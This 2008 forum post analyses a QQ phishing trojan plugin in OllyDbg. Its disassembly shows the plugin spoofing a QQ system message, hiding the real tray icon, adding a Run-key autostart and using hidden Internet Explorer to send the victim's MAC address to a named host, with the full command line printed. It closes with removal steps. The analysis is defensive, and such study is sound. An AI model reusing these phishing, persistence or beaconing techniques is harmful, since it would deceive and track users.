好友
阅读权限255
听众
最后登录1970-1-1
|
zzage
发表于 2008-11-24 17:39
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【文章标题】分析某个QQ的钓鱼木马插件
【文章作者】ZzAge[LCG]
【文章目标】某QQ钓鱼木马插件
【相关工具】OllyDbg
【作者 Q Q】85400516
【作者邮箱】zzage@163.com
【作者主页】http://hi.baidu.com/zzage
【文章日期】2008年11月24日
这个QQ钓鱼木马插件,挺逼真的,好像前阵子TX也都在提示小心中奖信息,估计就是这类QQ钓鱼木马插件的问题吧
附件有个样本,解压密码为:52pojie
一:动态创建假QQ系统消息窗口,用来钓鱼...
00110585 33D2 xor edx, edx
00110587 E8 C4B7FFFF call 0010BD50 ; 动态创建假QQ系统消息窗体
0011058C A1 80131100 mov eax, dword ptr [111380]
-----------
0010DC65 B9 00E01000 mov ecx, 0010E000 ; ASCII "Install"
0010DC6A BA 10E01000 mov edx, 0010E010 ; ASCII "SOFTWARE\Tencent\QQ"
0010DC6F B8 02000080 mov eax, 80000002
0010DC74 E8 7FE5FFFF call 0010C1F8 ; 取QQ路径
-----------
0010DDC6 BA 2CE01000 mov edx, 0010E02C ; ASCII "c:\tmpqq10000.tmp"
0010DDCB E8 F856FFFF call 001034C8
0010DDD0 8B4D F8 mov ecx, dword ptr [ebp-8]
0010DDD3 BA 48E01000 mov edx, 0010E048 ; ASCII "msg"
0010DDD8 B8 54E01000 mov eax, 0010E054 ; ASCII "mymsg"
0010DDDD E8 4EFDFFFF call 0010DB30 ; 释放资源,里面是一些加密的钓鱼站点,统计地址,和钓鱼信息
-------------
0010DE7F 64:FF30 push dword ptr fs:[eax]
0010DE82 64:8920 mov dword ptr fs:[eax], esp
0010DE85 8D55 D4 lea edx, dword ptr [ebp-2C]
0010DE88 A1 F0261100 mov eax, dword ptr [1126F0]
0010DE8D E8 AEEBFFFF call 0010CA40 ; 解密钓鱼网站,算法有兴趣可以看
0010DE92 8B55 D4 mov edx, dword ptr [ebp-2C]
0010DE95 B8 F0261100 mov eax, 001126F0
二:建立消息循环机制
0010841A E8 81C3FFFF call <jmp.&user32.TranslateMes>; 要处理的消息.看堆栈信息
0010841F 54 push esp
00108420 E8 03C2FFFF call <jmp.&user32.DispatchMess>; callback=109954就是要处理的消息call
00108425 8BC3 mov eax, ebx
00108427 83C4 1C add esp, 1C
0010842A 5E pop esi
0010842B 5B pop ebx
0010842C C3 retn
堆栈信息
0027FF74 0027FF78 \pMsg = WM_TIMER hw = 19101E (class="obj_") ID = B007C4 Callback = 109954
三:QQ钓鱼插件的关键CALL,
00109954 55 push ebp
00109955 8BEC mov ebp, esp
00109957 53 push ebx
00109958 8B45 10 mov eax, dword ptr [ebp+10]
0010995B 66:8378 23 00 cmp word ptr [eax+23], 0
00109960 74 0A je short 0010996C
00109962 8BD8 mov ebx, eax
00109964 8BD0 mov edx, eax
00109966 8B43 25 mov eax, dword ptr [ebx+25]
00109969 FF53 21 call dword ptr [ebx+21] ; QQ钓鱼插件的关键CALL,其行为主要在110298这里面~
0010996C 33C0 xor eax, eax
0010996E 5B pop ebx
0010996F 5D pop ebp
00109970 C2 1000 retn 10
四:枚举QQ进程
0010C8BB 8D85 BCFEFFFF lea eax, dword ptr [ebp-144]
0010C8C1 BA 1CCA1000 mov edx, 0010CA1C ; ASCII "qq.EXE"
0010C8C6 E8 FD6BFFFF call 001034C8
0010C8CB 6A 00 push 0
0010C8CD 6A 0F push 0F
0010C8CF E8 5CFFFFFF call <jmp.&kernel32.CreateToolhelp32Sn>; 建立进程快照
0010C8D4 8BF0 mov esi, eax
0010C8D6 C785 D7FEFFFF 2>mov dword ptr [ebp-129], 128
0010C8E0 8D85 D7FEFFFF lea eax, dword ptr [ebp-129]
0010C8E6 50 push eax
0010C8E7 56 push esi
0010C8E8 E8 4BFFFFFF call <jmp.&kernel32.Process32First> ; 开始枚举QQ进程
0010C8ED 83F8 01 cmp eax, 1
0010C8F0 1BDB sbb ebx, ebx
0010C8F2 43 inc ebx
0010C8F3 E9 80000000 jmp 0010C978
0010C8F8 8D95 A0FEFFFF lea edx, dword ptr [ebp-160]
0010C8FE 8B85 BCFEFFFF mov eax, dword ptr [ebp-144]
0010C904 E8 B393FFFF call 00105CBC
0010C909 8B85 A0FEFFFF mov eax, dword ptr [ebp-160]
0010C90F 50 push eax
0010C910 8D85 94FEFFFF lea eax, dword ptr [ebp-16C]
0010C916 8D95 FBFEFFFF lea edx, dword ptr [ebp-105]
0010C91C B9 04010000 mov ecx, 104
0010C921 E8 426DFFFF call 00103668
0010C926 8B85 94FEFFFF mov eax, dword ptr [ebp-16C]
0010C92C 8D95 98FEFFFF lea edx, dword ptr [ebp-168]
0010C932 E8 0598FFFF call 0010613C
0010C937 8B85 98FEFFFF mov eax, dword ptr [ebp-168]
0010C93D 8D95 9CFEFFFF lea edx, dword ptr [ebp-164]
0010C943 E8 7493FFFF call 00105CBC
0010C948 8B85 9CFEFFFF mov eax, dword ptr [ebp-164]
0010C94E 5A pop edx
0010C94F E8 2494FFFF call 00105D78
0010C954 85C0 test eax, eax
0010C956 75 06 jnz short 0010C95E
0010C958 C645 FF 01 mov byte ptr [ebp-1], 1
0010C95C EB 22 jmp short 0010C980
0010C95E 8D85 D7FEFFFF lea eax, dword ptr [ebp-129]
0010C964 50 push eax
0010C965 56 push esi
0010C966 E8 D5FEFFFF call <jmp.&kernel32.Process32Next>
0010C96B 83F8 01 cmp eax, 1
0010C96E 1BDB sbb ebx, ebx
0010C970 43 inc ebx
0010C971 6A 01 push 1
0010C973 E8 307BFFFF call <jmp.&kernel32.Sleep>
0010C978 84DB test bl, bl
0010C97A ^ 0F85 78FFFFFF jnz 0010C8F8
0010C980 56 push esi
0010C981 E8 027AFFFF call <jmp.&kernel32.CloseHandle>
五:判断QQ进程当前状态
0010C98A /74 17 je short 0010C9A3 ; 判断QQ进程当前状态
0010C98C |68 24CA1000 push 0010CA24
0010C991 |68 30CA1000 push 0010CA30 ; ASCII "#32770"
0010C996 |E8 A57CFFFF call <jmp.&user32.FindWindowA>
0010C99B |85C0 test eax, eax
0010C99D |76 04 jbe short 0010C9A3
0010C99F |C645 FF 00 mov byte ptr [ebp-1], 0
0010C9A3 \807D FF 00 cmp byte ptr [ebp-1], 0
0010C9A7 74 17 je short 0010C9C0
0010C9A9 68 38CA1000 push 0010CA38 ; ASCII "QQ登录"
0010C9AE 68 30CA1000 push 0010CA30 ; ASCII "#32770"
0010C9B3 E8 887CFFFF call <jmp.&user32.FindWindowA>
0010C9B8 85C0 test eax, eax
0010C9BA 76 04 jbe short 0010C9C0
0010C9BC C645 FF 00 mov byte ptr [ebp-1], 0
0010C9C0 807D FF 00 cmp byte ptr [ebp-1], 0
0010C9C4 74 08 je short 0010C9CE
六:应用程序的托盘图标是放在TrayNotifyWnd的子窗口ToolbarWindow32里的,所以以下的动作主要说要找QQ的托盘图标的句柄~
0010C31C 6A 00 push 0
0010C31E 68 58C31000 push 0010C358 ; ASCII "Shell_TrayWnd"
0010C323 E8 1883FFFF call <jmp.&user32.FindWindowA> ; 桌面上任务栏的句柄
0010C328 6A 00 push 0
0010C32A 68 68C31000 push 0010C368 ; ASCII "TrayNotifyWnd"
0010C32F 6A 00 push 0
0010C331 50 push eax
0010C332 E8 1183FFFF call <jmp.&user32.FindWindowExA>
0010C337 6A 00 push 0
0010C339 68 78C31000 push 0010C378 ; ASCII "SysPager"
0010C33E 6A 00 push 0
0010C340 50 push eax
0010C341 E8 0283FFFF call <jmp.&user32.FindWindowExA> ; 系统托盘区域句柄
0010C346 6A 00 push 0
0010C348 68 84C31000 push 0010C384 ; ASCII "ToolbarWindow32"
0010C34D 6A 00 push 0
0010C34F 50 push eax
0010C350 E8 F382FFFF call <jmp.&user32.FindWindowExA> ; 取得系统托盘句柄
0010C355 C3
七:系统托盘图标的进程
0010C44C E8 8782FFFF call <jmp.&user32.GetWindowThreadProce>; 打开系统托盘图标的进程explorer.exe
0010C451 8B45 F0 mov eax, dword ptr [ebp-10]
0010C454 50 push eax
0010C455 6A 00 push 0
0010C457 6A 38 push 38
0010C459 E8 2280FFFF call <jmp.&kernel32.OpenProcess>
0010C45E 8BD8 mov ebx, eax
0010C460 6A 04 push 4
0010C462 68 00300000 push 3000
0010C467 68 00100000 push 1000
0010C46C 6A 00 push 0
0010C46E 53 push ebx
0010C46F E8 3C80FFFF call <jmp.&kernel32.VirtualAllocEx>
0010C474 8945 F4 mov dword ptr [ebp-C], eax
0010C477 E8 2CFFFFFF call 0010C3A8 ; 获取Windows操作系统版本
0010C47C 8D85 B0FBFFFF lea eax, dword ptr [ebp-450]
0010C482 50 push eax
0010C483 A1 54131100 mov eax, dword ptr [111354]
0010C488 8985 A0FBFFFF mov dword ptr [ebp-460], eax
0010C48E C685 A4FBFFFF 0>mov byte ptr [ebp-45C], 0
0010C495 A1 58131100 mov eax, dword ptr [111358]
0010C49A 8985 A8FBFFFF mov dword ptr [ebp-458], eax
0010C4A0 C685 ACFBFFFF 0>mov byte ptr [ebp-454], 0
0010C4A7 8D95 A0FBFFFF lea edx, dword ptr [ebp-460]
0010C4AD B9 01000000 mov ecx, 1
0010C4B2 B8 E4C71000 mov eax, 0010C7E4 ; ASCII "%d.%d"
0010C4B7 E8 3C9BFFFF call 00105FF8
0010C4BC 8B85 B0FBFFFF mov eax, dword ptr [ebp-450]
0010C4C2 BA F4C71000 mov edx, 0010C7F4 ; ASCII "5.1"
0010C4C7 E8 1473FFFF call 001037E0
0010C4CC 0F82 3C010000 jb 0010C60E ; 因为w95跟w98和w2000的托盘图标放的地方不一样,所以这里加个判断
八:看堆栈地址和数据窗口
0010C691 E8 FA7DFFFF call <jmp.&kernel32.ReadProcessMemory>
0010C696 8D45 EC lea eax, dword ptr [ebp-14]
0010C699 50 push eax
0010C69A 68 01040000 push 401
0010C69F 8D85 B6FBFFFF lea eax, dword ptr [ebp-44A]
0010C6A5 50 push eax
0010C6A6 8B45 F4 mov eax, dword ptr [ebp-C]
0010C6A9 83C0 70 add eax, 70
0010C6AC 50 push eax
0010C6AD 53 push ebx
0010C6AE E8 DD7DFFFF call <jmp.&kernel32.ReadProcessMemory>
0010C6B3 8D45 E8 lea eax, dword ptr [ebp-18]
0010C6B6 8D95 B6FBFFFF lea edx, dword ptr [ebp-44A] ; 返回指定托盘图标的按钮指定文本
0010C6BC B9 01040000 mov ecx, 401
0010C6C1 E8 A26FFFFF call 00103668
九:创建注册表自启动,以便下次系统启动自动运行
0010EF6A 8D55 FC lea edx, dword ptr [ebp-4]
0010EF6D B8 54F01000 mov eax, 0010F054 ; ASCII "1ntrenat "
0010EF72 E8 F56CFFFF call 00105C6C
0010EF77 8D45 F8 lea eax, dword ptr [ebp-8]
0010EF7A E8 B144FFFF call 00103430
0010EF7F 837D FC 00 cmp dword ptr [ebp-4], 0
0010EF83 74 41 je short 0010EFC6
0010EF85 8D55 F0 lea edx, dword ptr [ebp-10]
0010EF88 33C0 xor eax, eax
0010EF8A E8 0D6FFFFF call 00105E9C
0010EF8F 8B45 F0 mov eax, dword ptr [ebp-10]
0010EF92 50 push eax
0010EF93 8B4D FC mov ecx, dword ptr [ebp-4]
0010EF96 BA 7CF01000 mov edx, 0010F07C ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run"
0010EF9B B8 02000080 mov eax, 80000002
0010EFA0 E8 67DCFFFF call 0010CC0C ; 创建注册表自启动
0010EFA5 8D45 EC lea eax, dword ptr [ebp-14]
0010EFA8 50 push eax
0010EFA9 8B4D FC mov ecx, dword ptr [ebp-4]
0010EFAC BA 7CF01000 mov edx, 0010F07C ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run"
0010EFB1 B8 02000080 mov eax, 80000002
0010EFB6 E8 3DD2FFFF call 0010C1F8
十:解密加密的钓鱼信息
0010EFC6 8D55 E8 lea edx, dword ptr [ebp-18]
0010EFC9 B8 C4F01000 mov eax, 0010F0C4 ; ASCII "323039363032383733323837343738336A747D763A2D27707475267675767B732C63672962637F666D6527 "
0010EFCE E8 996CFFFF call 00105C6C
0010EFD3 8B45 E8 mov eax, dword ptr [ebp-18]
0010EFD6 8D55 F4 lea edx, dword ptr [ebp-C]
0010EFD9 E8 62DAFFFF call 0010CA40 ; 统计地址的解密CALL,算法有兴趣的自己进去看看
0010EFDE 8D45 E4 lea eax, dword ptr [ebp-1C]
0010EFE1 50 push eax
0010EFE2 8D55 DC lea edx, dword ptr [ebp-24]
0010EFE5 8B45 F4 mov eax, dword ptr [ebp-C] ; 解密后的http://www.qqqsp.cn/bawang/
0010EFE8 E8 CF6CFFFF call 00105CBC
0010EFED 8B45 DC mov eax, dword ptr [ebp-24]
0010EFF0 8D55 E0 lea edx, dword ptr [ebp-20]
0010EFF3 E8 746CFFFF call 00105C6C
0010EFF8 8B45 E0 mov eax, dword ptr [ebp-20]
0010EFFB B9 07000000 mov ecx, 7
0010F000 BA 01000000 mov edx, 1
0010F005 E8 EA48FFFF call 001038F4
0010F00A 8B45 E4 mov eax, dword ptr [ebp-1C]
0010F00D BA 80F11000 mov edx, 0010F180 ; ASCII "http://"
0010F012 E8 C947FFFF call 001037E0
0010F017 75 0B jnz short 0010F024
0010F019 8B55 F8 mov edx, dword ptr [ebp-8]
0010F01C 8B45 F4 mov eax, dword ptr [ebp-C]
0010F01F E8 B8FAFFFF call 0010EADC ; 开始统计
十一:获取要统计的信息
0010EB06 55 push ebp
0010EB07 68 A9ED1000 push 0010EDA9
0010EB0C 64:FF30 push dword ptr fs:[eax]
0010EB0F 64:8920 mov dword ptr fs:[eax], esp
0010EB12 E8 A576FFFF call 001061BC ; 取本地时间
0010EB17 83C4 F8 add esp, -8
0010EB1A DD1C24 fstp qword ptr [esp]
0010EB1D 9B wait
0010EB1E 8D4D CA lea ecx, dword ptr [ebp-36]
0010EB21 8D55 CC lea edx, dword ptr [ebp-34]
0010EB24 8D45 CE lea eax, dword ptr [ebp-32]
0010EB27 E8 FC76FFFF call 00106228
0010EB2C 8D55 D8 lea edx, dword ptr [ebp-28]
0010EB2F 0FB745 CE movzx eax, word ptr [ebp-32]
0010EB33 E8 906FFFFF call 00105AC8
0010EB38 8D55 D4 lea edx, dword ptr [ebp-2C]
0010EB3B 0FB745 CC movzx eax, word ptr [ebp-34]
0010EB3F E8 846FFFFF call 00105AC8
0010EB44 8B45 D4 mov eax, dword ptr [ebp-2C] ; 得月份
0010EB47 E8 484BFFFF call 00103694
0010EB4C 48 dec eax
0010EB4D 75 10 jnz short 0010EB5F
0010EB4F 8D45 D4 lea eax, dword ptr [ebp-2C]
0010EB52 8B4D D4 mov ecx, dword ptr [ebp-2C]
0010EB55 BA C0ED1000 mov edx, 0010EDC0
0010EB5A E8 814BFFFF call 001036E0
0010EB5F 8D55 D0 lea edx, dword ptr [ebp-30]
0010EB62 0FB745 CA movzx eax, word ptr [ebp-36]
0010EB66 E8 5D6FFFFF call 00105AC8
0010EB6B 8B45 D0 mov eax, dword ptr [ebp-30] ; 得日数
0010EB6E E8 214BFFFF call 00103694
0010EB73 48 dec eax
0010EB74 75 10 jnz short 0010EB86
0010EB76 8D45 D0 lea eax, dword ptr [ebp-30]
0010EB79 8B4D D0 mov ecx, dword ptr [ebp-30]
0010EB7C BA C0ED1000 mov edx, 0010EDC0
0010EB81 E8 5A4BFFFF call 001036E0
0010EB86 FF75 D8 push dword ptr [ebp-28] ; 得年份
0010EB89 68 CCED1000 push 0010EDCC
0010EB8E FF75 D4 push dword ptr [ebp-2C]
0010EB91 68 CCED1000 push 0010EDCC
0010EB96 FF75 D0 push dword ptr [ebp-30]
0010EB99 8D45 DC lea eax, dword ptr [ebp-24]
0010EB9C BA 05000000 mov edx, 5
0010EBA1 E8 AE4BFFFF call 00103754
0010EBA6 8D45 C4 lea eax, dword ptr [ebp-3C]
0010EBA9 BA D8ED1000 mov edx, 0010EDD8 ; ASCII "sysqq.dat"
0010EBAE E8 1549FFFF call 001034C8
0010EBB3 8D55 B0 lea edx, dword ptr [ebp-50]
0010EBB6 8B45 FC mov eax, dword ptr [ebp-4]
0010EBB9 E8 26D0FFFF call 0010BBE4
0010EBBE 8D45 B0 lea eax, dword ptr [ebp-50]
0010EBC1 8D55 C0 lea edx, dword ptr [ebp-40]
0010EBC4 E8 8FD0FFFF call 0010BC58
0010EBC9 8B45 C4 mov eax, dword ptr [ebp-3C]
0010EBCC 50 push eax
0010EBCD 8D45 AC lea eax, dword ptr [ebp-54]
0010EBD0 50 push eax
0010EBD1 33C9 xor ecx, ecx
0010EBD3 BA ECED1000 mov edx, 0010EDEC ; ASCII "date"
0010EBD8 8B45 C0 mov eax, dword ptr [ebp-40]
0010EBDB E8 88FDFFFF call 0010E968 ; 写统计纪录的时间
0010EBE0 8B45 AC mov eax, dword ptr [ebp-54]
0010EBE3 8B55 DC mov edx, dword ptr [ebp-24]
0010EBE6 E8 F54BFFFF call 001037E0
0010EBEB 0F84 830100>je 0010ED74 ; 查sysqq.dat判断当天是否有统计记录,有纪录则跳走
sysqq.dat文件的内容
[5f5598be217e4b1e5898212bd4fb4ddc]
date=2008-11-23
0010EBF1 8D45 F4 lea eax, dword ptr [ebp-C]
0010EBF4 B9 FCED1000 mov ecx, 0010EDFC ; ASCII "install.asp"
0010EBF9 8B55 FC mov edx, dword ptr [ebp-4]
0010EBFC E8 DF4AFFFF call 001036E0
0010EC01 8D45 EC lea eax, dword ptr [ebp-14]
0010EC04 E8 7BFAFFFF call 0010E684 ; 取网卡MAC地址
0010EC09 837D F8 00 cmp dword ptr [ebp-8], 0
0010EC0D 75 0F jnz short 0010EC1E
0010EC0F 8D45 E4 lea eax, dword ptr [ebp-1C]
0010EC12 BA C0ED1000 mov edx, 0010EDC0
0010EC17 E8 AC48FFFF call 001034C8
0010EC1C EB 0D jmp short 0010EC2B
0010EC1E 8D45 E4 lea eax, dword ptr [ebp-1C]
0010EC21 BA 10EE1000 mov edx, 0010EE10
0010EC26 E8 9D48FFFF call 001034C8
0010EC2B 8D55 A8 lea edx, dword ptr [ebp-58]
0010EC2E B8 1CEE1000 mov eax, 0010EE1C ; ASCII "0 "
0010EC33 E8 3470FFFF call 00105C6C
0010EC38 8B45 A8 mov eax, dword ptr [ebp-58]
0010EC3B BA 10EE1000 mov edx, 0010EE10
0010EC40 E8 9B4BFFFF call 001037E0
0010EC45 75 0D jnz short 0010EC54
0010EC47 8D45 E4 lea eax, dword ptr [ebp-1C]
0010EC4A BA 10EE1000 mov edx, 0010EE10
0010EC4F E8 7448FFFF call 001034C8
0010EC54 68 2CEE1000 push 0010EE2C ; ASCII "ver="
0010EC59 8D55 A4 lea edx, dword ptr [ebp-5C]
0010EC5C B8 3CEE1000 mov eax, 0010EE3C ; ASCII "081020 "
0010EC61 E8 0670FFFF call 00105C6C
0010EC66 FF75 A4 push dword ptr [ebp-5C]
0010EC69 68 50EE1000 push 0010EE50 ; ASCII "&tgid="
0010EC6E 8D55 A0 lea edx, dword ptr [ebp-60]
0010EC71 B8 60EE1000 mov eax, 0010EE60 ; ASCII "myself "
0010EC76 E8 F16FFFFF call 00105C6C
0010EC7B FF75 A0 push dword ptr [ebp-60]
0010EC7E 68 84EE1000 push 0010EE84 ; ASCII "&address="
0010EC83 FF75 EC push dword ptr [ebp-14]
0010EC86 68 98EE1000 push 0010EE98 ; ASCII "®k="
0010EC8B FF75 E4 push dword ptr [ebp-1C]
0010EC8E 8D45 F0 lea eax, dword ptr [ebp-10]
0010EC91 BA 08000000 mov edx, 8
0010EC96 E8 B94AFFFF call 00103754
0010EC9B 8D55 E0 lea edx, dword ptr [ebp-20]
0010EC9E B8 A8EE1000 mov eax, 0010EEA8 ; ASCII "3137393731303537373030313536343430353A33 "
0010ECA3 E8 C46FFFFF call 00105C6C
0010ECA8 33C0 xor eax, eax
0010ECAA 55 push ebp
0010ECAB 68 D6EC1000 push 0010ECD6
0010ECB0 64:FF30 push dword ptr fs:[eax]
0010ECB3 64:8920 mov dword ptr fs:[eax], esp
0010ECB6 8D55 9C lea edx, dword ptr [ebp-64]
0010ECB9 8B45 E0 mov eax, dword ptr [ebp-20]
0010ECBC E8 7FDDFFFF call 0010CA40
0010ECC1 8B55 9C mov edx, dword ptr [ebp-64]
0010ECC4 8D45 E0 lea eax, dword ptr [ebp-20]
0010ECC7 E8 FC47FFFF call 001034C8
0010ECCC 33C0 xor eax, eax
0010ECCE 5A pop edx
0010ECCF 59 pop ecx
0010ECD0 59 pop ecx
0010ECD1 64:8910 mov dword ptr fs:[eax], edx
0010ECD4 EB 12 jmp short 0010ECE8
0010ECD6 ^ E9 7D40FFFF jmp 00102D58
0010ECDB 8D45 E0 lea eax, dword ptr [ebp-20]
0010ECDE E8 4D47FFFF call 00103430
0010ECE3 E8 2842FFFF call 00102F10
0010ECE8 68 18EF1000 push 0010EF18 ; ASCII "pwd"
0010ECED FF75 F0 push dword ptr [ebp-10]
0010ECF0 FF75 E0 push dword ptr [ebp-20]
0010ECF3 8D45 98 lea eax, dword ptr [ebp-68]
0010ECF6 BA 03000000 mov edx, 3
0010ECFB E8 544AFFFF call 00103754
0010ED00 8B45 98 mov eax, dword ptr [ebp-68]
0010ED03 8D55 B0 lea edx, dword ptr [ebp-50]
0010ED06 E8 D9CEFFFF call 0010BBE4
0010ED0B 8D45 B0 lea eax, dword ptr [ebp-50]
0010ED0E 8D55 E8 lea edx, dword ptr [ebp-18]
0010ED11 E8 42CFFFFF call 0010BC58
0010ED16 FF75 F4 push dword ptr [ebp-C] ; http://www.qqqsp.cn/bawang/install.asp
0010ED19 68 24EF1000 push 0010EF24
0010ED1E FF75 F0 push dword ptr [ebp-10]
0010ED21 68 30EF1000 push 0010EF30 ; ASCII "&flag="
0010ED26 FF75 E8 push dword ptr [ebp-18]
0010ED29 68 40EF1000 push 0010EF40 ; ASCII "&frandom="
十二 开始发送统计信息
0010E512 8D45 DC lea eax, dword ptr [ebp-24]
0010E515 E8 32FDFFFF call 0010E24C ; 查找IE路径
0010E51A 8B55 DC mov edx, dword ptr [ebp-24]
0010E51D 8D45 EC lea eax, dword ptr [ebp-14]
0010E520 B9 44E61000 mov ecx, 0010E644 ; ASCII "iexplore.exe "
0010E525 E8 B651FFFF call 001036E0
0010E52A FF75 EC push dword ptr [ebp-14] ; C:\program files\internet explorer\iexplore.exe
0010E52D 68 5CE61000 push 0010E65C ; ASCII " """
0010E532 FF75 FC push dword ptr [ebp-4]
0010E535 68 68E61000 push 0010E668
0010E53A 8D45 F0 lea eax, dword ptr [ebp-10]
0010E53D BA 04000000 mov edx, 4
0010E542 E8 0D52FFFF call 00103754
0010E547 8D45 F4 lea eax, dword ptr [ebp-C]
0010E54A BA 74E61000 mov edx, 0010E674 ; ASCII "IEFrame"
0010E54F E8 744FFFFF call 001034C8
0010E554 8D55 E8 lea edx, dword ptr [ebp-18]
0010E557 8B45 F4 mov eax, dword ptr [ebp-C]
0010E55A E8 F1FDFFFF call 0010E350
0010E55F 6A 00 push 0
0010E561 8B45 F0 mov eax, dword ptr [ebp-10]
0010E564 E8 2B53FFFF call 00103894
0010E569 50 push eax
0010E56A E8 595FFFFF call <jmp.&kernel32.WinExec> ; 以隐藏运行IE的发式访问统计地址
WinExe运行的参数
0027FD18 00B0C250 |CmdLine = "C:\program files\internet explorer\iexplore.exe ""http://www.qqqsp.cn/bawang/install.asp?ver=081020&tgid=myself&address=00-19-21-35-0B-BE®k=1&flag=9ebc529f4d7f1f8b729e40ddff6338b2&frandom=6272"""
0027FD1C 00000000 \ShowState = SW_HIDE
0010E56F 68 C4090000 push 9C4
0010E574 E8 2F5FFFFF call <jmp.&kernel32.Sleep>
0010E579 C645 FB 01 mov byte ptr [ebp-5], 1
0010E57D 8D55 E4 lea edx, dword ptr [ebp-1C]
0010E580 8B45 F4 mov eax, dword ptr [ebp-C]
0010E583 E8 C8FDFFFF call 0010E350 ; 通过查询IE句柄然后查IE标题,确定运行的IE,等下关闭
0010E588 8B45 E4 mov eax, dword ptr [ebp-1C]
0010E58B E8 6CC7FFFF call 0010ACFC
0010E590 8BD8 mov ebx, eax
0010E592 68 10270000 push 2710
0010E597 E8 0C5FFFFF call <jmp.&kernel32.Sleep>
0010E59C 85DB test ebx, ebx
0010E59E 7E 53 jle short 0010E5F3
0010E5A0 BE 01000000 mov esi, 1
0010E5A5 8D4D E0 lea ecx, dword ptr [ebp-20]
0010E5A8 8BD6 mov edx, esi
0010E5AA 4A dec edx
0010E5AB 8B45 E4 mov eax, dword ptr [ebp-1C]
0010E5AE E8 1DC8FFFF call 0010ADD0
0010E5B3 8B55 E0 mov edx, dword ptr [ebp-20]
0010E5B6 8B45 E8 mov eax, dword ptr [ebp-18]
0010E5B9 E8 32CAFFFF call 0010AFF0
0010E5BE 40 inc eax
0010E5BF 75 2E jnz short 0010E5EF
0010E5C1 8B45 E0 mov eax, dword ptr [ebp-20]
0010E5C4 E8 DB75FFFF call 00105BA4
0010E5C9 50 push eax
0010E5CA E8 2161FFFF call <jmp.&user32.IsWindowEnabled> ; 判断IE窗口是否处于活动状态
0010E5CF 85C0 test eax, eax
0010E5D1 74 20 je short 0010E5F3
0010E5D3 6A 00 push 0
0010E5D5 68 60F00000 push 0F060
0010E5DA 68 12010000 push 112
0010E5DF 8B45 E0 mov eax, dword ptr [ebp-20]
0010E5E2 E8 BD75FFFF call 00105BA4
0010E5E7 50 push eax
0010E5E8 E8 6B61FFFF call <jmp.&user32.SendMessageA> ; 发送系统命令消息SC_CLOSE,关闭IE进程
0010E5ED EB 04 jmp short 0010E5F3
十三:开始钓鱼动作
00110397 8B45 F0 mov eax, dword ptr [ebp-10]
0011039A E8 79FBFFFF call 0010FF18 ; 取QQ托盘图标的按钮文字和句柄,并通过发送消息隐藏QQ托盘图标
0011039F 6A 64 push 64
001103A1 E8 0241FFFF call <jmp.&kernel32.Sleep>
001103A6 8B43 28 mov eax, dword ptr [ebx+28]
001103A9 B2 01 mov dl, 1
001103AB E8 D48FFFFF call 00109384 ; 为假QQ消息窗口增加托盘图标
001103B0 6A 01 push 1
001103B2 6A 00 push 0
001103B4 8D45 EC lea eax, dword ptr [ebp-14]
001103B7 B9 54041100 mov ecx, 00110454 ; ASCII "sound\system.wav"
001103BC 8B15 BC2611>mov edx, dword ptr [1126BC]
001103C2 E8 1933FFFF call 001036E0 ; 取QQ系统消息音乐文件的路径
001103C7 8B45 EC mov eax, dword ptr [ebp-14]
001103CA E8 C534FFFF call 00103894
001103CF 50 push eax
001103D0 E8 1BBEFFFF call <jmp.&winmm.PlaySound> ; 然后播放QQ系统消息音乐文件
001103D5 8B43 24 mov eax, dword ptr [ebx+24]
001103D8 B2 01 mov dl, 1
001103DA 8B08 mov ecx, dword ptr [eax]
001103DC FF51 08 call dword ptr [ecx+8] ; 通过定时器,动态运行这个假QQ系统消息托盘图标
001103DF EB 17 jmp short 001103F8
十四
消息循环等待鼠标双击假的QQ系统托盘图标...
点击就显示假的QQ系统消息....然后发送消息显示真的QQ图标托盘~
基本上整个QQ钓鱼插件的运作过程差不多就这样!
出现这个提示中奖的消息,然后点击查看详情,或者查看按钮,就到了...钓鱼者事先设置好的网页...
木马清除方法:
清除这个QQ钓鱼木马插件很简单,先关掉这个QQ钓鱼木马插件的进程,然后打开注册表,删除Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run这个表项,最后删除QQ钓鱼木马插件,就这样...
PS:虽然掉馅饼的事可能会有,那几率几乎为0.00000......1,在网上一般不要相信什么中奖信息,基本上都是骗人的!
粗略分析一下,呵呵,有什么不对的地方,请多多指教....
-------------From:ZzAge[LCG] {www.52pojie.cn}------------------- |
|